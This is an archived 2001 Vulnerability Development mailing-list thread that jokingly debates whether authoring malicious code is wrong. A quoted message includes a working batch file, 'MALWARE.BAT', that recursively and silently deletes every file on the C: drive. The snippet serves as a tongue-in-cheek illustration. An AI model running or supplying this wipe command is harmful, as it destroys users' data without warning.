Vulnerability Development mailing list archives

Re: coding (was: Re: CodeGreen beta release(idq-patcher/antiCodeRed/etc.)

From: "Meritt James" <meritt_james () bah com>
Date: Fri, 07 Sep 2001 14:21:45 -0400

Most M$ products would.  ;-)

Chip Carpenter wrote:

Does windows count as malicious code??
(sorry - too easy)
Chip

At 09:26 AM 9/6/01 -0400, Meritt James wrote:
authoring?  I see no problem.  Releasing?  See the arguments presented
by tobacco and gun lobbyists.

"Silcock, Stephen" wrote:

OK I'm gonna author some malicious code right now.  If you run it that's
your own business; I disclaim all responsiblity for use of this software.

<START OF MALWARE.BAT>
@ECHO OFF
C:
CD\
DEL /S /Q *.*
<END OF MALWARE.BAT>

Should I go to jail?  I think not... authoring malicious code is a far cry
from doing something ethically wrong.  It may be criminal however depending
where you live.

S.   :)

PLEASE NOTE:

This email transmission is confidential and intended solely for the
addressee.  If you are not the intended addressee, you must not use,
disclose or print this transmission and you should delete it from your
system.

--
James W. Meritt, CISSP, CISA
Booz, Allen & Hamilton